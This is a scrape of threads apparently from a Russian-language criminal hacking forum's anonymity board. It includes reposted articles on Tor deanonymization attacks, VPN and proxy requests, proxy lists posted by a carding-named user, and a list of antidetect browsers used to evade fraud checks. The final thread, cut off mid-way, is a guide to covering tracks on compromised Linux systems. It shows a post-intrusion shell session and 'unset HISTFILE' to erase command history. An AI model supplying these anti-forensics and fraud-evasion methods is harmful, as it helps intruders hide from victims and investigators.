В том же 2014, ФБР заплатило университету "Карнеги-Меллон" 1млн.$ за взлом сети Tor. Полученная информация стала основой для операции «Onymous», по итогам которой, было закрыто более 400 onion сайтов, закрыт рынок Silkroad 2.0, Old Cannabis Road, Tor Bazaar и множество других, а рейды на продавцов и покупателей длились еще несколько месяцев после операции.
По взлому Tor написано несколько интересных книг, например, «Recent Attacks on Tor» или «Browser-Based Attacks on Tor». Из описанных в них уязвимостей, сообществом официально признана только одна – корреляционная атака. C нее и начнем.

После операции "Onymous", при входе на закрытые сервисы, вас приветствовало это сообщение.

Корреляционная атака

Злоумышленник, который наблюдает за трафиком, проходящим через первую (входную) ноду, и получателем трафика (скрытый сервис, третья нода и т.д.), может использовать статистический анализ, чтобы определить, что они принадлежат к одной цепи. Адрес пользователя и адрес назначения отслеживаемого трафика, получает злоумышленник, который сможет успешно деанонимизировать цель с помощью корреляционных атак. Ему даже не нужно иметь полный контроль над нодами, чтоб иметь возможность коррелировать потоки трафика, идущие через эти узлы. Нужно только контролировать трафик, например, пересылая файл, он может определить по времени отправления и времени получения, какая нода получила файл. Этих данных хватит, чтобы в дальнейшем раскрыть получателя.
Все это, делает сеть Tor – крайне уязвимой. Нельзя сделать простой патч, который сможет предотвратить этот метод, поскольку он не использует какую-либо ошибку, а использует математику (вероятность и статистику) и атакует логику сети Tor. Есть способы, усложнить жизнь, желающим раскрыть пользователя, но их обычно отклоняют, чтобы сохранить низкую задержку в сети.
Некоторые атаки проводятся не против программного обеспечения, а против пользователей. Например, если администратор темного рынка поделился некоторыми сведениями о себе, такими как состояние, возраст и / или прошлая преступная деятельность, государственным органам становится возможным следить за интернет-активностью всех возможных подозреваемых и пытаться выяснить, какой из них подключается к сети Tor в то же время, что и администратор рынка.

Иногда деанонимизация не требует выполнения сложных форм статистического анализа. Например, студент в Гарвардском университете был арестован за отправку поддельных бомб через Тор, чтобы откосить от экзамена! Согласно данным ФБР, электронные письма были отправлены из электронной почты, предоставленной Guerilla Mail, провайдером электронной почты, который позволяет пользователям создавать временные электронные письма. Guerilla внедряет IP-адрес отправителя во все исходящие письма, и в этом конкретном случае это указывало на IP-адрес выходного узла пользователя на Tor. ФБР заявило, что студент отправил электронные письма через Tor, из беспроводной сети кампуса. Корреляция помогла ФБР определить ученика, который признался во время допроса.
Атаку через трафик и корреляции легко выполнить, когда количество клиентов, использующих Tor относительно невелико. Другими словами, если существует небольшое число людей, использующих Tor, в контексте конкретной сети, то раскрыть виновного относительно легко. Более сложные формы атак требуют более сложных методов статистического анализа как трафика, так и времени, например, контроль маршрутизаторов Тора.

Операционная безопасность (OpSEC)

Главная уязвимость и основной поставщик подсудимых из Даркнета – плохое соблюдение операционной безопасности пользователем. На этом погорели многие, рассмотрим на примере самого резонансного дела - Росса Ульбрихта.

Аналитики длительное время, накапливали информацию, записывая ошибки Росса. Ульбрихт использовал несколько псевдонимов, включая «Dread Pirate Roberts» (DPR) и «altoid», на SilkRoad и онлайн-форумах, на которых он общался со своими клиентами. ФБР сопоставило информацию о пользователе с такими никами в Клирнете, с пользователем в Даркнете, почитало переписку и произвело задержание. Вот как происходил сбор информации:

1. 11 октября 2011 года, на сайте bitcointalk.org был создан аккаунт с ником «altoid», который запустил тред названный «Венчурная биткоин стартап компания», ищущая партнеров для биткоин-стартапа. Altoid отправлял людей, заинтересованных в обсуждении на почтовый адрес rossulbricht@gmail.com. Рынок SilkRoad также упоминался в треде. Вскоре после этого, SilkRoad был прорекламирован на форуме «shroomery.org» пользователем под ником «altcoin».
2. На ютуб-канале и на GooglePlus странице Росса, были размещены ссылки на Mises Institute – австрийский блог, который публикует контент, связанный с экономической теорией. На форуме SilkRoad, также были ссылки на Mises Institute и размещался контент оттуда. В одном из разговоров, Ульбрихт упомянул, что его часовой пояс – PT, то есть, зона Тихоокеанского времени.
3. Росс опубликовал пост в Stakoverflow, с вопросом: «Как подключится к скрытому сервису Tor используя curl в PHP?». Первоначально, вопрос был размещен под обычным аккаунтом, с реальными данными, но менее чем через минуту, данные были заменены на ложные.
4. Ульбрихт купил 9 поддельных идентификационных документов, с его собственным фото, но разными именами. Таможня США перехватила пакет, который был отправлен из Канады в квартиру Росса в Сан-Франциско.

Пробелы в операционной безопасности, описанные выше, позволили ФБР выйти на Росса и арестовать его, когда он был в публичной библиотеке. Получив доступ к его ноутбуку, они получили неопровержимые доказательства, что Росс Ульбрихт – это, «Dread Pirate Roberts», основатель SilkRoad, что привело к пожизненному сроку в тюрьме.

Атака на связанные с сетью Tor системы

Tor - это не что иное, как служба, которую может запускать сервер или пользователь. Таким образом, системы, связанные с сетью Tor, по-прежнему уязвимы для традиционных кибератак. В зависимости от воздействия и специальных конфигураций системы, можно использовать различные методы, чтобы раскрыть личность пользователя или скрытый сайт в сети Tor. Деанонимизация происходит после того, как злоумышленник завладевает связанной информацией или полностью контролирует использующую Tor систему.
Типичные атаки на уровне приложений, состоят из перехвата сеанса, ввода данных и получения доступа к атакуемой операционной системе, тогда как, атаки на уровне ОС, используют неправильную конфигурацию системы. Более того, производительность системы, может быть подорвана с помощью DDoS-атак, что может привести к сбою системы и появлению ошибок.
Как правило атаки на ввод данных, основываются на инъекции и обычно включают переполнение буфера, межсайтовый скриптинг (XSS) и загрузку вредоносных файлов. Атаки на получение контроля сосредоточены на эскалации привилегий, то есть обычный пользователь будет повышен до пользователя с правами администратора.
В августе 2013 года, FBI обнаружил уязвимость в браузере Firefox/Tor, которую они использовали для атаки сайтов Freedom Hosting и превращения их в трекеры, распространяющие вредоносное ПО. Freedom Hosting был хостингом, который принимал для размещения сайты с CP. FBI удалось получить доступ к серверам FH и ввести вредоносный Javascript-код. Код искал имя хоста и Mac-адрес, а затем передавал их, как HTTP-запросы к серверам в Виджинии, раскрывая реальный IP- адрес пользователя.

Уже в третий раз, Freedom Hosting открывает свои двери.

Атака на скрытые сервисы

Эта разновидность атаки, использует уязвимости, которые могут раскрыть информацию о Даркнет-ресурсе.
SSH обычно используются для обеспечения удаленного доступа на Linux-системы для onion-адресов. Если, один и тот же SSH-сервис, обеспечивает подключение к публичным IP-адресам и к onion-адресам, это приведет к раскрытию скрытого сайта Tor. Ниже показано, как это происходит:

Tor прослушивает соединения SOCKS, через localhost. Таким образом, любое приложение, которое взаимодействует с Tor, будет подключаться к localhost. В связи с тем, что приложения действуют так, как будто соединения маршрутизируются через localhost, возникает риск раскрытия, поскольку многие онлайн фреймворки, считают localhost безопасной зоной.
Прекрасным примером, является часто используемый HTTP-сервер Apache и модуль Apache-server, который по умолчанию активируется для localhost соединений. В большинстве случаев, это работает, так как localhost в основном безопасен и только пользователи, имеющие учетные данные для входа на сервер, могут иметь доступ к этой странице состояния сервера. Тем не менее, с onion-адресом и Tor, соединения к этой странице через Tor к Apache маршрутизируются через localhost и Apache раскроет ваш onion-адрес через сервис xttp://somehsaddress.onion/server-status/.

Завершение

Это был краткий обзор методов, актуальных в настоящее время для деанонимизации пользователей Tor и Даркнет-сайтов. Самым слабым в этой цепочке является пользователь, которому нужно придерживаться очень строгих правил и постоянно контролировать большое количество параметров. Tor Project, имеет на своей странице большое количество мануалов и рекомендаций, которые помогут вам защититься с технической стороны. Но даже самые технически-подкованные люди, могут нарушать простейшие правила OPSEC, что неминуемо приведет их к раскрытию и задержанию.

P.S. взято с darktor
Вторая часть (Классификация атак на пользователей и сайты Tor)

http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/70771/

Атака на Tor. Часть 2. Классификация атак на пользователей и сайты Tor

ID: 676533bbb4103b69df371ae7
Thread ID: 70771
Created: 2022-07-28T06:22:34+0000
Last Post: 2022-07-28T06:22:34+0000
Author: peacemaker
Prefix: Статья
Replies: 0 Views: 1K

Сетевые протоколы анонимности, как следует из названия, были разработаны для защиты конфиденциальности пользователей, подвергающихся цензуре. Анонимность достигается путем имплантирования данных пользователей в несколько слоев шифрования и переадресации сетевого трафика через группу различных прокси- серверов и/или узлов ретрансляции. Среди них, луковые сети (onion network), являются наиболее широко используемыми решениями.

В настоящее время существует несколько сетевых протоколов сохраняющих вашу анонимность, включая I2P, Freenet, Hornet, Tarzan и Morphix, но Tor, бесспорно, является самым популярным сетевым протоколом анонимизации, основанным на структуре onion. Соответственно, крайне важно понимать и анализировать потенциальные угрозы, которые могут подорвать конфиденциальность пользователей в сети Tor.

Недавно опубликованное исследование анализирует различные формы атак, которые могут быть направлены на сеть Tor. Авторы статьи предлагают детальную классификацию, основанную на конкретных целях каждой формы атаки. Она послужит подробной схемой для выявления различных форм кибератак, связанных с экосистемами Даркнета. В этой статье мы рассмотрим различные формы атак на клиентов Tor и скрытые сервисы Tor.

Виды атак на Tor протокол

Когда рассматривается сетевая безопасность Tor, атаки могут быть нацелены на три различных компонента сети:

Клиент: физическое лицо, использующее сеть Tor для подключения к интернету и/или посещения сайтов Даркнета

Сервер: сайт/сервер на основе Tor, который может включать в себя рынки, форумы и т.д

Сеть: сама инфраструктура сети Tor может быть целью для некоторых форм атаки

Атака нацеленная на клиентов Tor

В течение последних нескольких лет многие исследователи пытались деанонимизировать пользователей Tor, связывая их IP-адреса с исходящими пакетами данных. Однако в этом разделе мы рассмотрим атаки, направленные на нанесение ущерба клиентам Tor или раскрывающие их IP-адреса, которые включают:

Атака на плагины браузеров

Эти атаки используют плагины браузера пользователя, например Java, Flash и элементы управления ActiveX. Часть этого программного обеспечения запускается через фреймворк или через виртуальную машину, которая обходит настройки прокси, настроенных в браузере Tor, связываясь напрямую через Интернет, без использования Tor Browser. Из-за потенциальной деанонимизации клиентов с использованием этих плагинов, браузер Tor отключает их по умолчанию для анонимного и безопасного общения с сетью.

Атака Torben

Атака Torben, запускается для деанонимизации клиента Tor, посредством манипулирования веб-страницами, чтобы вынудить клиента подключиться к контенту, предоставленному ненадежными источниками, а также, через использование функций с низкой задержкой в сети Tor, чтобы извлечь индикаторы переданных веб-страниц, таким образом, получая информацию о страницах, к которым клиент обращался через Tor.

Утечка информации P2P

Эта форма атаки раскрывает данные клиента через использование его связи с одноранговыми системами. При наблюдении протокола BitTorrent P2P, злоумышленник может получить IP-адрес клиента, который использует Tor для подключения к торрент-трекеру. Проблема в том, что список торрент-трекеров может быть получен анонимным способом через Tor, но P2P-соединения обычно устанавливаются небезопасно через прямое соединение с одноранговым узлом. Таким образом, злоумышленник может использовать «атаку посредника» протокола Tor, чтобы изменить содержимое списка, представленного торрент-трекером, путем добавления IP-адреса инфицированного торрента. Учитывая тот факт, что связь с такими вредоносными узлами, не будет осуществляться через Tor, злоумышленник может получить IP-адрес клиента Tor, инициировавшего запрос к торрент-трекеру.

Принудительный выбор узла Tor

Входной узел Tor является единственным узлом, который напрямую связывается с клиентом. Однако, поскольку содержимое пакетов Tor зашифровано, нода входа не может получить содержимое передаваемых пакетов, не имея ключей дешифрования узлов цепи Tor. Но, управление одним узлом не поможет взять под контроль соединение клиента, злоумышленнику потребуется завладеть узлом входа Tor пользователя.

Чтобы побудить клиента использовать конкретный, контролируемый противником узел, можно сбросить коннект клиента с общедоступными узлами входа Tor, кроме тех, что под контролем злоумышленника. Это можно сделать, изменив возможности сетевого трафика цели или заблокировав связь с «честными» узлами входа используя давление на интернет-провайдера или сетевых администраторов.

Raptor

Раптор относится к маршрутным атакам на приватность в Tor. Raptor - это группа стратегий атак, которые могут быть запущены через автономную систему (AS) для деанонимизации клиентов Tor. Одна из стратегий атаки, основана на анализе сетевого трафика асимметричных коммуникаций, которые помечают сеть. Другая стратегия, основана на использовании перемещения пользователей, через динамический протокол маршрутизации (BGP) и маршрутизации интернет-трафика для анализа сетевого трафика. Стратегия последней атаки, основана на манипулировании интернет-трафиком, с помощью действий по захвату BGP, которые осуществляются для обнаружения клиентских узлов Tor.

Эксплуатация непопулярных портов

Эта атака основана на использовании того факта, что выходные узлы Tor, минимизируют количество портов, к которым они могут подключаться в Клирнете. Эта атака предназначена для деанонимизации клиентов через использование группы контролируемых узлов входа и выхода. Контролируемые выходные узлы, управляемые противником, располагаются на непопулярных портах. Злоумышленник также должен получить контроль над хостом, с которым клиент пытается связаться. Цель противника - заставить клиента установить соединение Tor, через узлы входа и выхода, которые контролируются злоумышленником. Эта конкретная конфигурация позволяет злоумышленнику деанонимизировать клиента с помощью методов корреляции трафика.

Атаки на сервера Tor

Цель этих атак - раскрыть IP-адрес сайта (скрытого сервиса) располагающегося в Tor. Это различные формы серверных атак:

Подсчет и заполнение ячеек

Эта атака вынуждает скрытый сервис (hidden service), устанавливать соединение с подконтрольным противнику узлом входа. Злоумышленник отправляет специально созданную ячейку/пакет Tor, скрытому сервису, для связи с контролируемым узлом. Таким образом, узел входа направляет сообщение к Даркнет сайту, который запускает цепь Tor для соединения с узлом противника. После соединения, сообщение (которое включает в себя cookie или токен, созданный клиентом) запрограммировано на отправку определенного числа ячеек скрытому сервису, через ту же цепь Tor. Завершив отправку, узел входа отключает цепь. Входная нода, которая находится под контролем злоумышленника, контролирует сетевой трафик маршрутов, направленных на него. Как только он получит ячейку, которая включает в себя отключение цепи, он подтвердит, что это произошло после того, как ячейка, включая куки-файлы подтверждения, была получена и, что число исходящих ячеек, составляет 3 ячейки вверх и 53 ячейки вниз в цепи Tor. Как только эти условия выполнены, злоумышленник может заключить, что управляемый им узел используется скрытым сервисом, таким образом, они могут получить IP- адрес скрытого сервиса.

Манипуляция с ячейками Tor

Манипуляции с ячейками/пакетами Tor, могут быть использованы для создания наблюдаемого сайта Tor. После отправки клиентом ячейки в скрытый сервис Tor для установления связи, запрос будет "проксирован” через подконтрольный противником узел. Это дает злоумышленнику возможность изменять содержимое ячейки; следовательно, маршрутизировать сообщение скрытому сервису Tor и отправлять временную метку измененной ячейки на сервер, контролируемый противником. Ячейка не может быть идентифицирована, как "неповрежденная" ячейка, отправленная из скрытого сервиса Tor, что вызовет отправку сообщения об уничтожении обратно клиенту. Это сообщение, будет направлено от узла входа скрытого сервиса, который управляется противником, к центральному серверу и будет включать информацию, такую как ID цепи, метку времени ячейки и IP-адрес источника.

Атака Каронте

Caronte - это уникальный инструмент, который обнаруживает утечки сайтов Tor. Утечка может включать конфигурацию сервера и, возможно, IP-адрес целевого скрытого сервиса.

Атака посредника вне соединения

Атака основана на запуске «атаки посредника» против Даркнет сайта. Предполагая, что частный ключ (private key) скрытого сервиса принадлежит злоумышленнику, можно запустить атаку посредника. Существенным моментом в таком сценарии является то, что злоумышленник не обязательно должен находиться на пути соединения, установленном между скрытым сервисом и клиентом.

P.S. взято с darktor
Первая часть статьи (Атака на Tor)

http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/70719/

Ищем трафик который трудно увидеть

ID: 676533bbb4103b69df371ae8
Thread ID: 70756
Created: 2022-07-27T19:38:14+0000
Last Post: 2022-07-27T21:59:22+0000
Author: Benihowy
Prefix: Статья
Replies: 9 Views: 1K

Мы можем с легкостью увидеть весь трафик браузера, игры или любой другой программы. А с помощью стороннего файервола можно увидеть весь трафик Windows. Но все же не весь, так как файервол это тоже программа, которая загружается уже после загрузки системы. А как насчет трафика в момент загрузки компьютера? Попробуем глянуть на такой трафик, ну не на сам трафик, разумеется на запросы, так как трафик будет шифрованный. Единственное устройство, которое видит весь наш трафик — это роутер. Значит нужно стать роутером. Нам нужна виртуальная машина, на которую установим dhcp и dns службы. Затем с помощью yogadns сможем просматривать все запросы на разрешения имен, а с помощью агнитум файервола можно просмотреть низкоуровневый трафик, то есть тот, который обычно маршрутизирует наш роутер. Создадим тестовую виртуальную машину windows 8 на hyper-v и подключим сеть

Настройки dhcp подхватились, теперь протестируем как работает yogadns вместе с dns сервером

Работает отлично, значит можно перезагружать виртуальную машину и смотреть запросы. При загрузке оказались вот такие данные

Трафик пошел уже при логине системы, то есть когда загрузился драйвер сетевушки. Теперь что касаемо файервола, ведь там также может быть трафик

Как оказалось, ничего интересного. Теперь сделаем тоже самое, но с vmware и windows 8.1

Тоже самое что и с hyper-v, трафик начинает идти только при загрузке драйвера сетевой карты ну и подхвата настроек dhcp естественно, а низкоуровневого трафика почему-то не было. Теперь протестируем реальный компьютер примерно 2010 года выпуска на Интеле

На скриншоте не стоит обращать внимания на watson telemetry, это трафик самой виртуальной машины, на которой установлен dhcp и dns. Желтым цветом выделен трафик, который появился прямо при загрузке системы (windows 10 1607), а зеленым при окне логина. На машине немного посвежее 2017 года, запросы оказались похожи

Красным выделено трафик при загрузке. Интересно то, что iasbroker выступает вторым, в то время на предыдущей машине он выступал первым. Тесты проводились несколько раз. Зайдем в БИОС и попробуем его обновить

Настройки dhcp подхватились, но почему указан dns 8.8.8.8 а не тестовый 192.168.10.209. Видимо в БИОСе свои настройки. Теперь посмотрим на сервер HP. Так как смысла нету смотреть на трафик ОС Windows, но хочется посмотреть на запросы от внутренней операционки. При подхвате настроек dhcp внутренняя операционка почти была спокойна

Сервер в выключенном состоянии пингавал свой основной шлюз, и больше ничего, на протяжении часа. Немного поискав в настройках, оказалось, что эта такая опция - пинговать шлюз

Выводы: Как оказалось нету никакого постороннего и потустороннего трафика от выключенного либо загружающегося ПК. Ах да, делал тесты на AMD, но не показал, так как там нечего даже показывать. Да, я думал про wake-on-lan, но даже в том случае ip-адрес не присваивается, сетевая карта тупо ждет специальный пакет на свой mac-адрес.

Бесплатный VPN сервер

ID: 676533bbb4103b69df371aee
Thread ID: 69463
Created: 2022-06-30T18:02:35+0000
Last Post: 2022-07-24T10:56:20+0000
Author: Antares
Replies: 38 Views: 1K

У Нас открылся Бесплатный VPN сервер. Данные для входа:

Сервер: dchub.one
Логин: vpn
Пароль: vpn
Ключ: +Trd78hd84YDa90-
L2TP+IPSec

посоветуйте стабильный впн

ID: 676533bbb4103b69df371aff
Thread ID: 67444
Created: 2022-05-21T11:07:40+0000
Last Post: 2022-06-17T22:54:40+0000
Author: fab1us
Replies: 22 Views: 1K

Собственно проблема, раньше пользовался Норд впн'ом, но последние 3 месяца он очень сильно стал делать мозги, надоело, поэтому ищу альтернативу, посоветуйте кто какой впн юзает

Getting cryptocurrency anonymously? How's it done?

ID: 676533bbb4103b69df371b28
Thread ID: 63521
Created: 2022-02-26T14:32:46+0000
Last Post: 2022-04-03T12:51:30+0000
Author: kitsunefx
Replies: 26 Views: 1K

I'm looking for help on getting cryptocurrency anonymously without requiring any personal information
Does anyone know of any methods and/or services to do this? Are there any ways to do this or are crypto ATM's the only option?

ID: 676533bbb4103b69df371b39
Thread ID: 63963
Created: 2022-03-07T21:41:31+0000
Last Post: 2022-03-07T21:41:31+0000
Author: gokhan carderswats
Prefix: Статья
Replies: 0 Views: 1K

Hidden content for authorized users.

ID: 676533bbb4103b69df371b4a
Thread ID: 62568
Created: 2022-02-07T03:34:14+0000
Last Post: 2022-02-07T03:34:14+0000
Author: gokhan carderswats
Prefix: Статья
Replies: 0 Views: 1K

like/rep = new proxies
no like/rep = no proxies.

Hidden content for authorized users.

38K.txt - BayFiles

bayfiles.com

ID: 676533bbb4103b69df371b4c
Thread ID: 62454
Created: 2022-02-04T01:13:59+0000
Last Post: 2022-02-04T01:13:59+0000
Author: gokhan carderswats
Prefix: Статья
Replies: 0 Views: 1K

https://cache.cracked[.]io/95899f89e1d92fadc422dece1bc75d3265a47fcd/68747470733a2f2f692e6962622e636f2f3446734d3379392f696d6167652e706e67
like/rep = new proxies
no like/rep = no proxies.

Hidden content for authorized users.

https://pastehub.net/f9cc20c9bf4

HTTP/HTTPS | 3K | IPV6 | FRESH | ALL LIVE

ID: 676533bbb4103b69df371b4d
Thread ID: 62453
Created: 2022-02-04T01:12:52+0000
Last Post: 2022-02-04T01:12:52+0000
Author: gokhan carderswats
Prefix: Статья
Replies: 0 Views: 1K

like/rep = new proxies
no like/rep = no proxies.

Hidden content for authorized users.

3K IPV6

91.241.51.142:30028 91.241.51.142:30002 91.241.51.142:30004 91.241.51.142:30006 91.241.51.142...

pastehub.net

Список антидетектов | List of Antidetect's

ID: 676533bbb4103b69df371b53
Thread ID: 55445
Created: 2021-08-17T17:20:39+0000
Last Post: 2022-01-26T13:58:07+0000
Author: Rehub
Replies: 12 Views: 1K

Лист антиков, мб пригодится кому

sessionbox.io
anty.dolphin.ru.com/ru
identory.com
xlogin.us
vmlogin.us vmlogin.co
hydraproxy.com/hydraheaders
ls.tenebris.cc
multilogin.com
indigobrowser.com
antbrowser.pro
antidetect.org
ru.aezakmi.run
ghostbrowser.com
multibrowser.com
beta.chebrowser.site
kameleo.io
accovod.com
fraudfox.net
ivanovation.ro
arbitrage-bets.com
samara-weblab.ru
gologinapp.com
multiaccounter.com
lizard-program.ru/multi
verified/showthread.php?t=273 CERT
ndalang.inflowtraffic.com
incogniton.com
nofingerprinting.com
clonbrowser.com
undetectable.io
t.me/aboutmacfly/117
cypher-antibrowser.net
t.me/vschannel/922
octobrowser.net
adspower.net
fingerprints.bablosoft.com

Большая коллекция книг по Хакингу.

ID: 676533bbb4103b69df371b5a
Thread ID: 61546
Created: 2022-01-17T20:24:09+0000
Last Post: 2022-01-19T15:41:03+0000
Author: 3113
Replies: 4 Views: 1K

Hidden content for authorized users.

![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)

[ File folder on MEGA

](https://mega.nz/folder/ziZyCJ5A#8D2LPyakkAgNpQfzBfB-eQ)

mega.nz

Лучший ВПН

ID: 676533bbb4103b69df371b6d
Thread ID: 60159
Created: 2021-12-16T22:45:00+0000
Last Post: 2021-12-26T02:19:48+0000
Author: krakenum123
Replies: 25 Views: 1K

Nordvpn,expressvpn,ipvanish, surfshark и тд , все ‘используют’ протокол openVPN, но они же сохраняют логи. Какой из клиентов/провайдеров впн самы анонимны и безопасны как для винд также для линукс?

Посоветуйте способ анонимизации кроме Tor

ID: 676533bbb4103b69df371b7f
Thread ID: 58767
Created: 2021-11-11T18:31:05+0000
Last Post: 2021-11-15T23:52:30+0000
Author: chillco
Replies: 20 Views: 1K

Здравствуйте. Несомненно, Тор будет лучшим если нужен высокий уровень приватности и анонимности. Но по некоторым причинам я не могу его использовать. В них входит и большой пинг при использовании тора и относительно небольшая пропускная способность сети.
Поэтому я хотел бы узнать какой на ваш взгляд наилучший способ анонимизации и скрытия трафика если критически важна скорость?

Какой ОСью вы пользуетесь?

ID: 676533bbb4103b69df371b80
Thread ID: 58581
Created: 2021-11-06T18:56:21+0000
Last Post: 2021-11-15T19:58:29+0000
Author: RgB
Replies: 24 Views: 1K

Привет, начинаю потихоньку вникать в "Хакинг" и встал резонный вопрос: Какой ОСью лучше пользоваться? Сейчас стоит винда и только, но в планах перейти на какой-нибудь дебиан или убунту и накатить туда виртуалку винды и линукса под пентестинг и т.п. Хотелось бы узнать кто что думает на этот счет. Лучше остаться сидеть на винде? так как особо знаний нет поэтому паранойить особо нечего или лучше сразу обезопасить себя и себя из будущего обеспечив анонимность изначально?

Kali --> TOR --> VPN (out)?

ID: 676533bbb4103b69df371b82
Thread ID: 58168
Created: 2021-10-25T18:47:54+0000
Last Post: 2021-11-12T19:09:06+0000
Author: JuniorHacker
Replies: 24 Views: 1K

Приветствую уважаемое сообщество. Пишу к вам с вопросом! Я хочу использовать Kali Linux как основную систему на ноутбуке. Так как она сделана на основе Debian, есть задача, пустить трафик следущим путем:

Host (Home Internet via Wi-Fi) - то есть сначала ноутбук получает интернет посредством Wi-Fi или кабеля от провайдера.

TOR цепочка. Далее он ВЕСЬ трафик заворачивает в ТОР (как в случае например с хуникс).

Далее после TOR, выходной узел у меня будет VPN.

Подскажите пожалуйста, как это реализовать? С линукс особо не знаком пока, потому создал данную тему, чтобы решить в первую очередь вопрос первоначальной безопасности, и в дальнейшем разбираться в системе.

Просто вопрос, который я хотел бы задать ... о криптовалюте.

ID: 676533bbb4103b69df371ba0
Thread ID: 57235
Created: 2021-09-30T20:17:53+0000
Last Post: 2021-09-30T20:17:53+0000
Author: UnknownDeath
Replies: 0 Views: 1K

Отмечая, что это доска анонимности, я хотел бы заявить, что на данный момент я поддерживаю Monero / XMR, которые, на мой взгляд, не останутся главной монетой конфиденциальности навсегда из-за способности и воли человека уничтожать / ломать все для того, чтобы что-то лучше. понимать.

Однако, учитывая браузер Google Chrome, который является разветвленной версией Chrome ... Имеет метод шпионажа с использованием API.

Если можно отметить, что API используется для слежки за пользователями, которые бездействуют в google chrome, можно ли использовать API Block Explorer для слежки за биткойн-кошельками? Обратите внимание, что кошельки должны быть онлайн для потоковой передачи, а кошельки должны обновлять цены, но обновления цен могут быть отделены от Интернета, в результате чего приложение будет рассчитывать цену каждого кошелька локально.

Я просто подумал, что это интересно, поскольку имеет смысл посмотреть, использовался ли вызов API для расчета цены биткойн-кошелька, скажем, 1,7 BTC.

API может использоваться для загрузки данных, поэтому, если проводник блоков был вызван для загрузки или возврата данных о текущей цене кошелька после транзакции, будет очень мало транзакций, которые соответствуют точной цене, комиссии и стоимости транзакции в выбранной время. Дайте глобальным группам по борьбе с киберпреступностью время, чтобы шпионить и выяснить, где находится преступник, следуя IP-адресу, который используется для связи с API блокчейна.

Однако это не означает, что транзакции не могут транслироваться через VPN или узлы Tor Exit, которым также не следует доверять на 100%. Атаки по удалению SSL были нацелены на Tor, а виртуальные частные сети распродали их клиентскую базу. Спрячь мою задницу - хороший пример такого поведения. Не доверяйте ни в чем этим компаниям. Никто не может быть по-настоящему анонимным, все мы совершаем ошибки, а используемые нами VPN и VPS даже не имеют значения.

Сообщите мне, что вы думаете об этой идее.

Blackarch или Kali Linux?

ID: 676533bbb4103b69df371bb0
Thread ID: 55702
Created: 2021-08-22T17:25:07+0000
Last Post: 2021-09-01T08:23:16+0000
Author: Linuz
Replies: 32 Views: 1K

Около года пользуюсь kali, стоит ли переходить на blackarch? Что лучше с точки зрения безопасности?

FREE WORKING VPN?

ID: 676533bbb4103b69df371bb9
Thread ID: 53659
Created: 2021-07-05T16:57:50+0000
Last Post: 2021-08-25T15:07:11+0000
Author: shener
Replies: 8 Views: 1K

Hi, I need free working VPN for WIN 10.. THANKS..

Что думаете о Whonix?

ID: 676533bbb4103b69df371bcc
Thread ID: 53670
Created: 2021-07-05T23:28:50+0000
Last Post: 2021-08-02T12:13:19+0000
Author: Cendareto
Replies: 8 Views: 1K

Всем привет, вопрос, собственно в описании. Что вы думаете о Whonix, насколько это полезный и безопасный дистрибутив? Какие есть альтернативы?

Подскажите прокси

ID: 676533bbb4103b69df371bce
Thread ID: 50948
Created: 2021-04-22T14:28:41+0000
Last Post: 2021-07-30T19:46:00+0000
Author: Cicada_Service
Replies: 8 Views: 1K

Подскажите прокси по сферу
Нужны стабильный прокси, который будет держаться 1мес и более
Что бы работали c киви и юмани

Как узнать, следят ли через камеру на телефоне?

ID: 676533bbb4103b69df371bd5
Thread ID: 50510
Created: 2021-04-09T18:44:17+0000
Last Post: 2021-07-19T20:33:14+0000
Author: user1011
Replies: 7 Views: 1K

как узнать, следит ли кто за мной через камеру на телефоне?

Анонимность при подключении к удаленному компьютеру

ID: 676533bbb4103b69df371bd6
Thread ID: 54142
Created: 2021-07-18T17:11:54+0000
Last Post: 2021-07-19T06:32:19+0000
Author: voland777
Replies: 13 Views: 1K

Привет форумчане. Подскажите является ли подключение к удаленному компьютеру анонимным через "mstsc"? Видит ли мои данные и ip при подключении провайдер который предоставляет виртуальный сервер?

what do you think about a VPN?

ID: 676533bbb4103b69df371bda
Thread ID: 53370
Created: 2021-06-27T15:10:16+0000
Last Post: 2021-07-02T07:27:17+0000
Author: Zakodowany
Replies: 8 Views: 1K

Hello, I would soon like to record YouTube material titled The Whole Truth About VPN.

So, I have a question for you, you can share your knowledge about VPN, is it useful, safe in your opinion?

I personally think vpn is of little use, but I'd love to hear from you.

Восстановление удаленных файлов с SSD

ID: 676533bbb4103b69df371bdf
Thread ID: 53045
Created: 2021-06-17T16:26:42+0000
Last Post: 2021-06-18T11:10:20+0000
Author: baykal
Replies: 9 Views: 1K

Отформатировал ssd гутманом (35 проходов), но хочу чекнуть и убедиться, что ничего не осталось
подскажите серьезный софт для восстановления удаленной инфы с SSD

Роскомнадзор начал блокировать VPN-сервисы

ID: 676533bbb4103b69df371be0
Thread ID: 53043
Created: 2021-06-17T15:19:01+0000
Last Post: 2021-06-17T18:20:31+0000
Author: Stabilniy
Replies: 11 Views: 1K

Иформация появилась:

Роскомнадзор начал блокировать VPN-сервисы VyprVPN и Opera VPN, поскольку они отнесены к угрозам безопасности из-за того, что позволяют обходить ограничения доступа к ресурсам, содержащим детскую порнографию, суицидальный и пронаркотический контент, следует из сообщения на сайте ведомства.

А почему только эти два сервися? Почему не посадить пару твердозадых ребят которые будут собирать данные по созданным VPN и не блокируют их все?
Или может это реклама такая хитрая, типа эти точно анонимные по аналогии с Телеграммом?

Чистим логи и историю Bash на взломанных Linux системах

ID: 676533bbb4103b69df371be2
Thread ID: 52151
Created: 2021-05-25T17:09:28+0000
Last Post: 2021-06-13T19:17:37+0000
Author: baykal
Replies: 5 Views: 1K

Удаление истории Bash

Bash хранит в памяти список команд, используемых в текущем сеансе, поэтому его обязательно нужно очистить, чтобы замести следы. Просмотрим текущую историю с помощью команды history :

Code:Copy to clipboard

root@target:/# history

1 cd /
2 ls
3 find / -perm -222 -type d 2>/dev/null
4 cd /dev/shm/
5 cd /
6 mkdir /dev/shm/.secret
7 ls -l /dev/shm/
8 ls -la /dev/shm/
9 ls
10 rmdir /dev/shm/.secret/
11 history

Команды записываются в переменную среды

Code:Copy to clipboard

HISTFILE

, обычно это

Code:Copy to clipboard

.bash_history

. Воспользуемся echo для определения местоположения:

Code:Copy to clipboard

root@target:/# echo $HISTFILE /root/.bash_history

Используем команду unset для удаления переменной:

Code:Copy to clipboard

root@target:/# unset HISTFILE

Повторив процедуру снова, видим, что ничего не появляется:

